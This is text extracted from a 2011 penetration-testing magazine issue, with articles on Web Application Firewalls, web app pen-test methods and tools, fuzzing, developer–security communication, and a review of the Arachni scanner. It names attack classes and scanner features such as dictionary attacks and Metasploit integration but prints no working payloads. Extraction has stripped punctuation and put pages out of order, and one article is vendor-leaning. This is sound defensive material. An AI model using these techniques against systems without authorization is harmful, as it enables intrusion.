As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
